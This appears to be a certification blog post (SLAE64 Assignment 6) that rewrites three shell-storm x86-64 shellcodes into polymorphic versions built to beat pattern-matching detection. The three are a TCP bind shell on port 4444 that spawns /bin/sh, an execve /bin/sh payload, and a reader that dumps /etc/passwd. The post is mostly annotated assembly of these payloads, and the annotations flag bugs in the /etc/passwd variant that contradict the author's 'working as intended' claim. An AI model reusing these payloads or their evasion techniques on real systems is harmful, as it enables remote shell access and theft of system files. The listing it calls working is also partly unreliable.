SLAE64: Assignment 6 – Polymorphic Shellcode

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:

https://www.pentesteracademy.com/course?id=7

Student-ID: PA-15847

The Objectives for the Assignment:

- Take up 3 shellcode from shell-storm and create polymorphic versions of them to beat pattern matching
- the polymorphic versions cannot be larger than 150% of the existing shellcode
- bonus points for making it shorter in length than original

The first shellcode is TCP Bind Shell:

http://shell-storm.org/shellcode/files/shellcode-858.php

1.1 Here’s the original code for the first syscall:

; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) — the original shell-storm sequence.
; Argument registers are cleared first, then loaded with push imm8 / pop reg
; (presumably to keep NUL bytes out of the encoding).
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
xor r8,r8                       ; cleared here; the bind listing later uses r8 to hold the fd
push 0x2
pop rdi                         ; rdi = 2  (AF_INET)
push 0x1
pop rsi                         ; rsi = 1  (SOCK_STREAM)
push 0x6
pop rdx                         ; rdx = 6  (IPPROTO_TCP)
push 0x29
pop rax                         ; rax = 41 (socket)
syscall                         ; rax = new socket fd, or -errno on failure

1.2 Here’s the replacement for the syscall socket()

; Replacement for socket(): same three arguments, loaded with add/inc instead of push/pop.
xor rax,rax
add al, 0x29 ;41:syscall number (socket)
xor rdi,rdi
add rdi,0x2 ;2:AF_INET
xor rsi,rsi
inc rsi     ;1:SOCK_STREAM
xor rdx,rdx ;0: protocol — socket()'s third argument (not INADDR_ANY); 0 = kernel default for the socket type
syscall
mov rdi,rax ;keep the socket fd in rdi: the bind/listen/accept replacements below reuse it without reloading

2.1 The next part is simply the bind() syscall

; bind(fd, &sockaddr_in, 16) — original sequence (Intel/PTR syntax, apparently objdump output).
; The 16-byte struct is built on the stack: two zero qwords, then family and port patched in.
mov r8,rax                      ; r8 = socket fd (rax from the socket() syscall)
xor r10,r10
push r10
push r10                        ; 16 zero bytes: sin_addr stays 0 (INADDR_ANY), padding stays 0
mov BYTE PTR [rsp],0x2          ; sin_family = AF_INET
mov WORD PTR [rsp+0x2],0x697a   ; sin_port: bytes 7a 69 in memory = 0x7a69 = 31337 in network byte order
mov rsi,rsp                     ; rsi = &sockaddr
push r8
pop rdi                         ; rdi = fd
push 0x10
pop rdx                         ; rdx = 16 (sizeof sockaddr_in)
push 0x31
pop rax                         ; rax = 49 (bind)
syscall

2.2. Let’s replace it as we wrote in the first assignment

; Replacement for bind(): sockaddr built with pushes only, port 4444 instead of 31337.
; Relies on state left by the socket() replacement: rdi = socket fd and rdx = 0
; (syscall clobbers only rcx/r11, so rdx survives the socket() call).
xor rax, rax 
push rax
push rax            ;0.0.0.0 — 16 zero bytes: sin_addr = INADDR_ANY plus zero padding
push word 0x5C11    ;port 4444 — bytes 11 5c in memory = 0x115c = 4444, network byte order
push word 0x02      ;2:AF_INET (sin_family); rsp now points at the start of the struct
mov rsi,rsp         ;rsi = &sockaddr
add rdx,0x10        ;16:length — assumes rdx is still 0 from the earlier xor
add al, 0x31        ;49:syscall bind (rax was just zeroed, so al carries the whole number)
syscall

3.1 The next part appears to be the listen() syscall, judging by the 0x32 syscall number

; listen(fd, 1) — original sequence.
push r8
pop rdi                         ; rdi = socket fd saved in r8
push 0x1
pop rsi                         ; rsi = backlog of 1
push 0x32
pop rax                         ; rax = 50 (listen)
syscall

3.2 We can replace it with our original code

; Replacement for listen(): rdi is not reloaded — it still holds the socket fd stored
; by the socket() replacement (the bind replacement leaves rdi untouched).
xor rax,rax
add al, 0x32    ;50:syscall listen
xor rsi,rsi
inc rsi         ;1:backlog
syscall

4.1 The next section appears to be the accept() syscall, judging by the 0x2b syscall number

; accept(fd, addr, &addrlen) — original sequence.
mov rsi,rsp                     ; rsi = rsp, used as the addr out-buffer (presumably the sockaddr area left from bind)
xor rcx,rcx
mov cl,0x10                     ; rcx = 16
push rcx
mov rdx,rsp                     ; rdx = &addrlen (points at the 16 just pushed)
push r8
pop rdi                         ; rdi = listening fd
push 0x2b
pop rax                         ; rax = 43 (accept)
syscall                         ; rax = connected fd

4.2 We’ll replace it with our original code

; Replacement for accept(): passes NULL for both addr and addrlen (accept(2) permits this),
; so no stack buffer is needed. rdi still holds the listening fd.
xor rax,rax
add al, 0x2b    ;43:syscall accept
xor rsi,rsi     ;0:rsi — addr = NULL
mov rdx,rsi     ;0:rdx — addrlen = NULL
syscall
mov r15,rax     ;r15 = connected client fd; the dup2 replacement below reads it from here

5.1 This one can be replaced with our dup2() syscall

; dup2(client_fd, n) — one pass of the original's loop; its back-edge (jne 4000ef)
; shows up at the top of the next listing.
pop rcx                         ; restores a value from the stack (the 0x10 pushed before accept, going by the previous listing); looks like loop state — cannot confirm from here
xor r9,r9                       ; redundant: the mov below overwrites all 64 bits of r9
mov r9,rax                      ; r9 = connected fd
mov rdi,r9                      ; rdi = connected fd
xor rsi,rsi
push 0x3
pop rsi
dec rsi                         ; rsi = 3 - 1 = 2 (stderr on the first pass)
push 0x21
pop rax                         ; rax = 33 (dup2)
syscall

5.2 Here’s the replacement

; Replacement for dup2(): loop over fds 2, 1, 0 so the client socket becomes stdin/stdout/stderr.
xor rsi,rsi
add rsi, 0x02   ;counter with fd — start at 2 (stderr) and count down
mov rdi, r15    ;socket handle that we saved before (the accept replacement stores the connected fd in r15)

loop:           ;note: `loop` is also an x86 mnemonic; a label such as dup_loop reads less ambiguously
    xor rax,rax  ;rax holds the previous syscall's return value, so it is re-zeroed every pass
    add al,0x21  ;33:syscall dup2
    syscall      ;dup2(rdi, rsi); syscall clobbers only rcx/r11, so rsi survives
    dec rsi
    jns loop     ;continue while rsi >= 0: runs for 2, 1, 0 and exits once rsi becomes -1

6.1 Here’s the last part of the original shellcode

; execve("/bin/sh", NULL, NULL) — original sequence.
jne 4000ef                      ; objdump artefact: conditional back-edge to the dup2 loop at 0x4000ef in the original binary; not assemblable as written and logically belongs to the listing above
xor rdi,rdi
push rdi
push rdi
pop rsi                         ; rsi = 0 (argv = NULL)
pop rdx                         ; rdx = 0 (envp = NULL)
movabs rdi,0x68732f6e69622f2f   ; little-endian bytes spell "//bin/sh"
shr rdi,0x8                     ; drop the leading '/': "/bin/sh" followed by a NUL byte
push rdi                        ; string now on the stack
push rsp
pop rdi                         ; rdi = pointer to "/bin/sh"
push 0x3b
pop rax                         ; rax = 59 (execve)
syscall

6.2 We’ll replace this one with Syscall execve()

; Replacement for execve(): execve("//bin/sh", argv = {"//bin/sh", NULL}, envp = {NULL}).
xor rax, rax        
add rax, 59         ; rax = 59 (execve); 64-bit add with an imm8 encodes without NUL bytes

xor r9, r9
push r9             ; zero qword: terminates the 8-byte path pushed next

mov rbx, 0x68732f6e69622f2f    ;/bin//sh in reverse — little-endian bytes spell "//bin/sh"; no NUL inside the immediate
push rbx 

mov rdi, rsp        ; rdi = path pointer
push r9
mov rdx, rsp        ; rdx = envp -> {NULL}

push rdi
mov  rsi, rsp       ; rsi = argv -> {path, NULL} (the NULL is the r9 pushed just before)
syscall

The second shellcode is Execve /bin/sh:

http://shell-storm.org/shellcode/files/shellcode-603.php

; shell-storm 603: execve("/bin/sh", {"/bin/sh", NULL}, NULL)
xor  rdx, rdx                   ; rdx = 0 (envp = NULL)
mov  qword rbx, '//bin/sh'      ; 8-byte string literal
shr  rbx, 0x8                   ; drop the leading '/': "/bin/sh" followed by a NUL byte

push rbx                        ; path on the stack
mov  rdi, rsp                   ; rdi = path
push rax                        ; argv terminator — nothing in this listing zeroes rax, so it relies on rax being 0 on entry (assumption; verify for the intended loader)
push rdi
mov  rsi, rsp                   ; rsi = argv -> {path, rax}
mov  al, 0x3b                   ; rax = 59 (execve), again assuming the upper bytes are already 0
syscall

We can easily modify the first 3 lines as below:

;; xor rdx, rdx
sub rdx, rdx                    ; same effect as xor: rdx = 0
push rdx                        ; zero qword that sits right after the 8-byte path pushed later and acts as its NUL terminator

;; mov  qword rbx, '//bin/sh'
mov rbx, 0x68732f2f6e696201     ; "/bin//sh" with the first byte off by 0x2e; no NUL in the immediate

;; shr  rbx, 0x8
add rbx, 0x2e                   ; 0x01 + 0x2e = 0x2f ('/'), no carry: rbx is now little-endian "/bin//sh" (8 bytes, unterminated — the pushed rdx supplies the NUL)

The 3rd shellcode is cat /etc/passwd:

http://shell-storm.org/shellcode/files/shellcode-878.php

I’ve included the original code from shell-storm below and replaced some of the lines, leaving the original lines commented out

; shell-storm 878 variant: open("/etc/passwd") -> read into a stack buffer -> write to stdout -> exit.
; jmp/call/pop trick: the call pushes the address of `path`, which _readfile pops into rdi.
_start:
jmp _push_filename
  
_readfile:
pop rdi                         ; rdi = address of path
; xor byte [rdi + 11], 0x41     ; (original) patched byte 11 into a NUL terminator; with it removed, nothing here terminates the 11-byte string — verify what byte follows `path` in the final buffer
; xor rax, rax
xor rsi, rsi                    ; rsi = 0 (O_RDONLY)
push rsi                        ; pushes a zero qword; appears unused by the open() call below
push   0x2	
; add al, 2
pop    rax                      ; rax = 2 (open)
; xor rsi, rsi 		
syscall                         ; rax = fd
  
sub sp, 0xfff                   ; 16-bit sub: only the low 16 bits of rsp change (avoids NUL bytes; wraps upward if sp's low 16 bits are < 0xfff)
lea rsi, [rsp]                  ; rsi = buffer
mov rdi, rax                    ; rdi = fd
xor rdx, rdx
;xor rax, rax
mov rax, rdx                    ; rax = 0 (read)
mov dx, 0xfff                   ; rdx = 0xfff (count)
syscall                         ; rax = bytes read
  
xor rdi, rdi
;add dil, 1 
inc rdi                         ; rdi = 1 (stdout)
mov rdx, rax                    ; rdx = byte count from read
;xor rax, rax
;add al, 1
mov rdi, rax                    ; NOTE(review): this overwrites the stdout fd with the byte count and leaves rax = byte count as the syscall number; the commented-out lines set rax to 1 (write), so `mov rax, rdi` looks like the intended instruction
syscall
  
xor rax, rax
add al, 60                      ; rax = 60 (exit)
syscall
  
_push_filename:
call _readfile                  ; pushes the address of `path` as the return address
path: db "/etc/passwd"          ; 11 bytes, no terminator (see the note at the first commented-out xor above)

All of them are smaller in size and working as intended. 🙂

You can find the full code in my Github repository:

https://github.com/areyou1or0/SLAE64/
